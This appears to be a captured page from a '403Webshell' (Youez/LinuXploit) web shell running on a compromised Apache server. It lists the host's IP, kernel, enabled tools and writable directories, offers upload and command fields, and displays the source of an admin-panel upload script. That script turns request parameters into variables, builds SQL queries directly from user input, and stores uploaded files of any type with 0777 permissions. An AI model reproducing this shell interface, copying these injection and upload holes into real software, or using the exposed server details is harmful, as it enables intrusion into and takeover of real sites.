403Webshell
Server IP : 103.234.187.230  /  Your IP : 216.73.216.216
Web Server : Apache
System : Linux lserver42043-ind.megavelocity.net 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/rsdgroup/adminPanel/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/rsdgroup/adminPanel/write_downloads.php
<?php
include_once("session.php");
include_once("settings.php");

foreach ($_REQUEST as $key => $value) {
    $$key = $value;
}

$target_path_val = "../cat_images/downloads/";
$prefix = time();
$target_path = $target_path_val . basename($prefix . $_FILES['image']['name']);
$target_path1 = $target_path_val . basename($prefix . $_FILES['upload_file']['name']);
$title = $_POST['title'];
$status  =  $_POST['status'];   



//           EDIT code
if ($_REQUEST['mode'] == "Edit") {  
       
    $Image_Data="select * from  tbl_downloads where id = '" .$_POST['id']. "'"; 
    $query=  mysql_query($Image_Data); 
    $rows = mysql_fetch_assoc($query);

    if ($_FILES['image']['name'] != "") {
        
        $image_path = @unlink("../cat_images/downloads/".$rows['image']);
        if (move_uploaded_file($_FILES['image']['tmp_name'], $target_path)) {
            chmod($target_path, 0777);
            $upload_image = basename($prefix . $_FILES['image']['name']);
        }
    } else {
        $upload_image = $rows['image'];
    }
    
    
    if ($_FILES['upload_file']['name'] != "") {
        
        $image_path1 = @unlink("../cat_images/downloads/".$rows['upload_file']);
        if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $target_path1)) {
            chmod($target_path1, 0777);
            $upload_file = basename($prefix . $_FILES['upload_file']['name']);
        }
    } else {
        $upload_file = $rows['upload_file'];
    }

    $sql = "update  tbl_downloads set title = '" . $title . "',image = '" . $upload_image . "',upload_file = '" . $upload_file . "',status = '" . $status . "'  where id = '" . $_POST['id'] . "'";

}   
else {

    if ($_FILES['upload_file']['name'] != "") {
        if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $target_path1)) {
            chmod($target_path1, 0777);
            $upload_file = basename($prefix . $_FILES['upload_file']['name']);
        }else{
            echo 'not done';die;
        }
    }
    
    
    if ($_FILES['image']['name'] != "") {
   
        if (move_uploaded_file($_FILES['image']['tmp_name'], $target_path)) {
            chmod($target_path, 0777);
            $upload_image = basename($prefix . $_FILES['image']['name']);
        }else{
            echo 'not done';die;
        }
    }
    
    $sql = "insert into  tbl_downloads (title,image,upload_file,status) VALUES ('$title','$upload_image','$upload_file','$status')";
     
}

$result = mysql_query($sql) 
        or die(mysql_error());
?>

<script>
    document.location = "downloads_list.php?page=listdownloads";
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit